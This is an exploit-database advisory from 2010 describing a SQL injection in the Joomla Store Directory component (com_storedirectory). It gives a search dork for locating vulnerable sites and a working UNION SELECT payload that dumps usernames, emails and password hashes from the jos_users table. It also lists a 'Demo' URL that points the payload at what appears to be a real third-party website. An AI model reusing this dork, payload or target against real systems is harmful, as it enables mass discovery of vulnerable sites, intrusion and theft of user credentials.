The Joomla Store Directory component suffers a remote SQL injection vulnerability.
e0d387d62c3907fa3d83e79f97a1f44b6d892f6f396e3fb48339ecdbc1b5c5de
=======================================================================
# Joomla Component (com_storedirectory) SQL Injection Vulnerability
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ######################################### 7
1 I'm XroGuE 1337 Member from 1337 DataBase 1
3 ######################################### 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
# Name: Joomla Component (com_storedirectory) SQL Injection Vulnerability
# Vendor: N/A
# Date: 2010-11-25
# Author: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org/forums/
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
==========================================================================
[+] Dork: inurl:"index.php?option=com_storedirectory"
==========================================================================
[+] vuln: http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=[SQLi]
[+] Exploit: UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users
[+] Demo: http://mirrabookasquare.com.au/index.php?option=com_storedirectory&task=view&id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users
==========================================================================